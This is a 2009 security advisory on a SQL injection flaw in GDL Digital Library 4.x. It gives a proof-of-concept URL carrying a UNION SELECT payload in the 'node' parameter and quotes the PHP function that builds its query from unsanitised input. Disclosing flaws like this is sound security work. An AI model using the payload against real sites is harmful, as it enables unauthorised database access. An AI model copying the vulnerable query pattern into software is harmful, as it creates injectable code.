GDL version 4.x suffers from a remote SQL injection vulnerability.
c9ee69a33d17f6fba5b12ec8fecf9f4ab3887f8da011359be6a781607b67c99b*******************************************************************************************
[ Discovered by g4t3w4y \ jkthackerlink[at]gmail.com ]
[ transitory only http://jakartaweb.net/home/GDL-Digital-Library-SQL-Injection-Vulnerability.html :) ]
###################################################
# [ GDL v.4.x ] SQL Injection Vulnerability #
###################################################
#
# Script:
# GDL 4.0 | htdocs .gz
# GDL 4.0 | windows application
# GDL 4.2 | htdocs .zip
#
# Script site: http://kmrg.itb.ac.id
# Download: http://kmrg.itb.ac.id
#
# [SQL] Vuln : http://localhost/gdl.php?mod=browse&node=0+AND+1=2+UNION+SELECT+0,1,2--
#
# Bug: ./functions/browse.php (line: 286-311)
#
# function browse_child_list($node)
# {
# $strsql = "SELECT folder.*, folder_tree.NODE
# FROM folder, folder_tree
# WHERE
# folder_tree.PARENT = '$node' AND
# folder_tree.NODE = folder.NODE ";
#
# $dbres = mysql_query($strsql);
#
# if ($dbres){
# while ($row = mysql_fetch_array($dbres)){ // SQL inj
# $html .= browse_folder_print($row,2);
# }
#
# if (!empty($html)){
# $box_html = "<table cellSpacing=0 cellPadding=2 border=0>$html</table>";
# return $box_html;
# } else {
# return NULL;
# }
# } else {
# stdout_error(mysql_error());
# return NULL;
# }
# }
##################################################
# Greetz: cozmaster * E-C-H-O Team * and otherz.. #
##################################################
[ g4t3w4y / 2009 ]
*******************************************************************************************
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed